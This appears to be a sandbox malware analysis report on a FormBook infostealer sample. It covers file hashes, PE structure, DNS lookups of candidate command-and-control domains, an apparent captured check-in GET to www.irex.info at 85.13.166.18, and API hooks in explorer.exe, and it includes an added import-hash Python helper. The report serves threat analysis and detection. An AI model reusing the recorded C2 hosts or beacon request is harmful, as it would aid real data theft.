www.irex.info | RFQ 242024.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
www.irex.info | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 85.13.166.18
www.irex.info | October 2024 PricesOffer Rates.bat.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
www.irex.info | Request For PO-230102.bat.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
NMM-ASD-02742FriedersdorfHauptstrasse68DE | http://theluckyhouse.vn/dnkdl | Get hash | malicious | Unknown | Browse | 85.13.134.160
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://ampa.fi/uEvMZCXCvX | Get hash | malicious | Unknown | Browse | 85.13.154.145
NMM-ASD-02742FriedersdorfHauptstrasse68DE | Statement of Account.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | New PO 127429.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | nklarm7.elf | Get hash | malicious | Unknown | Browse | 85.13.184.4
NMM-ASD-02742FriedersdorfHauptstrasse68DE | Payment Reciept FL202306150003 Request 10273 Konturteile.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | 4ui8luUSNp.exe | Get hash | malicious | Coinhive, Xmrig | Browse | 85.13.166.174
NMM-ASD-02742FriedersdorfHauptstrasse68DE | Request For PO-230102.bat.exe | Get hash | malicious | FormBook | Browse | 85.13.166.18
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://allegro-worxx.de/ | Get hash | malicious | Unknown | Browse | 85.13.161.130
NMM-ASD-02742FriedersdorfHauptstrasse68DE | https://atpscan.global.hornetsecurity.com/?d=48cXMF0z7lMlWaR4-PlsbtUc8mFiMfFFndJRjEPuYtN-uYwWsyWxL5J5MR-Ug5CE&f=dme3IKUCx1CkAEFqHg7DwPw18BP_OQlvudnvuL33-Lpo64IRdbltM4_7BbS22Zf4&i=&k=uvEU&m=C-1BZKEYF-Cl5rwq0_FrWo_rnOtg9J2VjL7wG_KiYQ4zCmrhfgeCWZm7jI2FLiWiujyVfZXhjPSaNszUHd_-tPPbHZVMqnN_KxIKzjHidCoVjgDEgxtyWq50QMIznX31&n=msheiBXClL42beZAq-0MKeu_K3YWbf4RbFSWB4nMvrZjKHZvlfgqWpnAMmHJM8nOBGwYdLcEaXDrA0ElMeqJyA&r=qQoQsacw6FZ-pWCR9Ygk8d_uohNhiBjvfkDS9IBTRytjYPkbqiDbNjzjfMkGfqGW&s=c3334c9337ad200a046268dabfc48b0b462d8959b1985605036142fc4b1a8f81&u=https%3A%2F%2Fmqqaqm.clicks.mlsend.com%2Ftb%2Fc%2FeyJ2Ijoie1wiYVwiOjEwNjMxNTQsXCJsXCI6MTMxNjM1NDA2NzI2NzU5NjE3LFwiclwiOjEzMTYzNTQwNjk1MTE1NTExNX0iLCJzIjoiMWU0NDhhM2JiYjBjYmJmOSJ9 | Get hash | malicious | Unknown | Browse | 85.13.157.247

No context
No context
Process: C:\Users\user\Desktop\JHnNxt6Pnb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380046556058007
Encrypted: false
SSDEEP: 48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//YUyus:tLHxv2IfLZ2KRH6Oug8s
MD5: 2628E843EF7060E91426823B102E13AA
SHA1: 6FE0AD465404E6929BFEBA2D4F397D8F2D295CE1
SHA-256: 4DC6B06D7934D36877120520E8EA2999A08349B2124C51B6444F52FC6C388C85
SHA-512: CD405D5274DB025437B70CDD2643D751431FFA83EE5BB84415F71B8F2B82EDDD0FD87BB5A77D9DDF6C198FC8193248975BE629BED5E32C0A63C6593C5F0222DF
Malicious: false
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.799582218853214
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: JHnNxt6Pnb.exe
File size: 635'904 bytes
MD5: b631685c5ef9ee26ded25c76ab3eda27
SHA1: 03696b36c4838440cf8def9687117745c9edbd19
SHA256: a6d2a47171f9630a8db62eb4001e196dfbad94cf40638e108cc649883d1bc069
SHA512: 62fe2308ad1490495ec283027e2f07c7d5179ba9a327791de0b98a5f29db4ea3c721d3866674cedcb4033153ff5515d7f5bdc17d547191519dba70cd1c483134
SSDEEP: 12288:tLczRLw1+27aPipUXT8eseyW2dv1WlYpXJk1jJT8CWqpqJ4uSYGExH0z:dctLw1+AaPOUXIjew1Umsj+0q2
TLSH: D3D4F1D87215F4AEC4538BB14874EE765A343EBAA217C30381E75CAB790D697DE102F2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o..g..............0.............^.... ........@.. ....................................`................................
Icon Hash: 01242c66198d8d9e
Entrypoint: 0x49ba5e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x670AE76F [Sat Oct 12 21:17:35 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9ba10          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9c000          0x13a0        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Two things to read off this table: the SECURITY directory is empty, so the file carries no Authenticode signature, and the COM_DESCRIPTOR (CLR header) directory is populated, which confirms a .NET assembly.
Sections

.text
  Virtual Address: 0x2000   Virtual Size: 0x99a64   Raw Size: 0x99c00
  MD5: be55bf2e9e280d2759c908e85fe5a30d   Xored PE: False   ZLIB Complexity: 0.8994188262195122
  File Type: data   Entropy: 7.807750703003363
  Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

.rsrc
  Virtual Address: 0x9c000   Virtual Size: 0x13a0   Raw Size: 0x1400
  MD5: e6e1a46e2c1d1b6262c84cfc4cc295e5   Xored PE: False   ZLIB Complexity: 0.778125
  File Type: data   Entropy: 7.024635237638305
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

.reloc
  Virtual Address: 0x9e000   Virtual Size: 0xc   Raw Size: 0x200
  MD5: eb1a0df1f0664d173adda81cda7b0d58   Xored PE: False   ZLIB Complexity: 0.044921875
  File Type: data   Entropy: 0.10191042566270775
  Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

An entropy of 7.81 (out of a maximum of 8) across roughly 630 KB of .text is far higher than compiled IL and metadata produce; together with the "contains potential unpacker" and "found malware configuration" findings it points to an encrypted or compressed payload stored inside the section. The section MD5s are the useful file-level pivot here, because the import hash of a .NET executable is not discriminating (see the imports below).
Resources

Name           RVA      Size   Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0x9c0e8  0xf91  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.8936010037641154
RT_GROUP_ICON  0x9d07c  0x14   data                                                                            1.05
RT_VERSION     0x9d090  0x30c  data                                                                            0.4307692307692308
Imports

DLL          Import
mscoree.dll  _CorExeMain
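The import hash in the PE header above is derived from exactly this one import. As an added example (not code from the report or from Joe Sandbox), the following Python reimplements the pefile-style import hash, checks it against the value the report lists, and shows why that value is useless for clustering: every managed executable has the same native import table (mscoree!_CorExeMain, or _CorDllMain for a DLL). The ordinal convention ("ordNNN") follows pefile; pefile additionally maps well-known ordinals of ws2_32/oleaut32 to names, which is not replicated here.

```python
import hashlib

# Constructed from the report's import table: the sample's only native import.
SAMPLE_IMPORTS = [("mscoree.dll", "_CorExeMain")]
REPORTED_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"


def imphash(imports):
    """pefile-style import hash.

    Each import becomes "<dll without .dll/.ocx/.sys>.<function>", lower-cased,
    in import-table order; the entries are joined with commas and MD5-hashed.
    Imports by ordinal are written as "ordNNN" (pefile's convention for
    ordinals it cannot name).
    """
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def is_generic_dotnet_stub(imports):
    """True when the native import table is only the CLR entry stub, i.e. the
    import hash carries no information about the managed code at all."""
    return (
        len(imports) == 1
        and imports[0][0].lower() == "mscoree.dll"
        and imports[0][1] in ("_CorExeMain", "_CorDllMain")
    )


def pivot_value(imports, section_md5s):
    """Pick a file-level pivot: the import hash when it is discriminating,
    otherwise the per-section MD5s (as in the report's section table)."""
    if is_generic_dotnet_stub(imports):
        return ("section-md5", tuple(sorted(section_md5s.items())))
    return ("imphash", imphash(imports))


if __name__ == "__main__":
    print(imphash(SAMPLE_IMPORTS), "matches report:", imphash(SAMPLE_IMPORTS) == REPORTED_IMPHASH)
    print(pivot_value(SAMPLE_IMPORTS, {".text": "be55bf2e9e280d2759c908e85fe5a30d"}))
```

A native sample with even a single real import produces a different hash, which is what makes the import hash worthwhile for unmanaged malware and pointless for this one.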
Suricata IDS alerts

Timestamp                         SID      Signature                              Severity  Source IP    Source Port  Dest IP       Dest Port  Protocol
2024-12-05T16:50:25.171196+0100   2031412  ET MALWARE FormBook CnC Checkin (GET)  1         192.168.2.8  49716        85.13.166.18  80         TCP
2024-12-05T16:50:25.171196+0100   2031449  ET MALWARE FormBook CnC Checkin (GET)  1         192.168.2.8  49716        85.13.166.18  80         TCP
2024-12-05T16:50:25.171196+0100   2031453  ET MALWARE FormBook CnC Checkin (GET)  1         192.168.2.8  49716        85.13.166.18  80         TCP

All three alerts are raised on the same TCP session (192.168.2.8:49716 to 85.13.166.18:80), the single HTTP check-in shown further below.
TCP packets

Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Dec 5, 2024 16:50:24.067549944 CET  49716        80         192.168.2.8   85.13.166.18
Dec 5, 2024 16:50:24.187494040 CET  80           49716      85.13.166.18  192.168.2.8
Dec 5, 2024 16:50:24.187576056 CET  49716        80         192.168.2.8   85.13.166.18
Dec 5, 2024 16:50:24.187833071 CET  49716        80         192.168.2.8   85.13.166.18
Dec 5, 2024 16:50:24.307676077 CET  80           49716      85.13.166.18  192.168.2.8
Dec 5, 2024 16:50:24.682780981 CET  49716        80         192.168.2.8   85.13.166.18
Dec 5, 2024 16:50:24.843650103 CET  80           49716      85.13.166.18  192.168.2.8
Dec 5, 2024 16:50:25.171139002 CET  80           49716      85.13.166.18  192.168.2.8
Dec 5, 2024 16:50:25.171195984 CET  49716        80         192.168.2.8   85.13.166.18
UDP packets

Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Dec 5, 2024 16:50:02.859833956 CET  59083        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:50:03.078313112 CET  53           59083      1.1.1.1       192.168.2.8
Dec 5, 2024 16:50:23.105048895 CET  58421        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:50:24.066509962 CET  53           58421      1.1.1.1       192.168.2.8
Dec 5, 2024 16:50:43.949125051 CET  63730        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:50:44.165515900 CET  53           63730      1.1.1.1       192.168.2.8
Dec 5, 2024 16:51:05.280121088 CET  49850        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:51:05.570362091 CET  53           49850      1.1.1.1       192.168.2.8
Dec 5, 2024 16:51:25.902410030 CET  50686        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:51:26.132848978 CET  53           50686      1.1.1.1       192.168.2.8
Dec 5, 2024 16:51:46.326582909 CET  61682        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:51:46.551973104 CET  53           61682      1.1.1.1       192.168.2.8
Dec 5, 2024 16:52:06.902546883 CET  59110        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:52:07.129349947 CET  53           59110      1.1.1.1       192.168.2.8
Dec 5, 2024 16:52:27.621648073 CET  65455        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:52:27.846096992 CET  53           65455      1.1.1.1       192.168.2.8
Dec 5, 2024 16:52:48.919939041 CET  50013        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:52:49.204158068 CET  53           50013      1.1.1.1       192.168.2.8
Dec 5, 2024 16:53:09.760350943 CET  56346        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:53:10.035132885 CET  53           56346      1.1.1.1       192.168.2.8
Dec 5, 2024 16:53:31.855633974 CET  53757        53         192.168.2.8   1.1.1.1
Dec 5, 2024 16:53:32.157536030 CET  53           53757      1.1.1.1       192.168.2.8
DNS queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
Dec 5, 2024 16:50:02.859833956 CET  192.168.2.8  1.1.1.1  0xb62b    Standard query (0)  www.inn-paaaa.buzz          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:50:23.105048895 CET  192.168.2.8  1.1.1.1  0xa8bd    Standard query (0)  www.irex.info               A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:50:43.949125051 CET  192.168.2.8  1.1.1.1  0x647     Standard query (0)  www.yzq0n.top               A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:05.280121088 CET  192.168.2.8  1.1.1.1  0xb2ff    Standard query (0)  www.siabgc4d.online         A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:25.902410030 CET  192.168.2.8  1.1.1.1  0x7ba4    Standard query (0)  www.48372305.top            A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:46.326582909 CET  192.168.2.8  1.1.1.1  0x591d    Standard query (0)  www.77179ksuhr.top          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:06.902546883 CET  192.168.2.8  1.1.1.1  0x1c6c    Standard query (0)  www.f6b-crxy.top            A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:27.621648073 CET  192.168.2.8  1.1.1.1  0x7e0d    Standard query (0)  www.azino-forum-pro.online  A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:48.919939041 CET  192.168.2.8  1.1.1.1  0x9e71    Standard query (0)  www.68716329.xyz            A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:53:09.760350943 CET  192.168.2.8  1.1.1.1  0x229     Standard query (0)  www.apita.top               A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:53:31.855633974 CET  192.168.2.8  1.1.1.1  0x8e0c    Standard query (0)  www.oldsteps.buzz           A (IP address)  IN (0x0001)  false
DNS answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code      Name                        CName  Address       Type            Class        DNS over HTTPS
Dec 5, 2024 16:50:03.078313112 CET  1.1.1.1    192.168.2.8  0xb62b    Name error (3)  www.inn-paaaa.buzz          none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:50:24.066509962 CET  1.1.1.1    192.168.2.8  0xa8bd    No error (0)    www.irex.info                      85.13.166.18  A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:50:44.165515900 CET  1.1.1.1    192.168.2.8  0x647     Name error (3)  www.yzq0n.top               none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:05.570362091 CET  1.1.1.1    192.168.2.8  0xb2ff    Name error (3)  www.siabgc4d.online         none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:26.132848978 CET  1.1.1.1    192.168.2.8  0x7ba4    Name error (3)  www.48372305.top            none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:51:46.551973104 CET  1.1.1.1    192.168.2.8  0x591d    Name error (3)  www.77179ksuhr.top          none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:07.129349947 CET  1.1.1.1    192.168.2.8  0x1c6c    Name error (3)  www.f6b-crxy.top            none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:27.846096992 CET  1.1.1.1    192.168.2.8  0x7e0d    Name error (3)  www.azino-forum-pro.online  none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:52:49.204158068 CET  1.1.1.1    192.168.2.8  0x9e71    Name error (3)  www.68716329.xyz            none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:53:10.035132885 CET  1.1.1.1    192.168.2.8  0x229     Name error (3)  www.apita.top               none   none          A (IP address)  IN (0x0001)  false
Dec 5, 2024 16:53:32.157536030 CET  1.1.1.1    192.168.2.8  0x8e0c    Name error (3)  www.oldsteps.buzz           none   none          A (IP address)  IN (0x0001)  false

Ten of the eleven names returned NXDOMAIN; www.irex.info is the only one that resolved (85.13.166.18), and the TCP connection to that address starts one millisecond after the answer arrives. The lookups are spaced roughly 20 seconds apart, which is the pattern behind the "tries to resolve many domain names, but no domain seems valid" signature: FormBook walks its configured list of candidate C2 hosts in turn, and most entries in such lists are decoys. Whether a name that does resolve is attacker-controlled or a legitimate site that merely happens to exist cannot be decided from the DNS record alone; the URI pattern of the check-in below is the stronger indicator.
                                                                                                                            • www.irex.info
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.84971685.13.166.18804084C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 5, 2024 16:50:24.187833071 CET168OUTGET /cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP HTTP/1.1
                                                                                                                            Host: www.irex.info
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:


Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE6

Target ID: 0
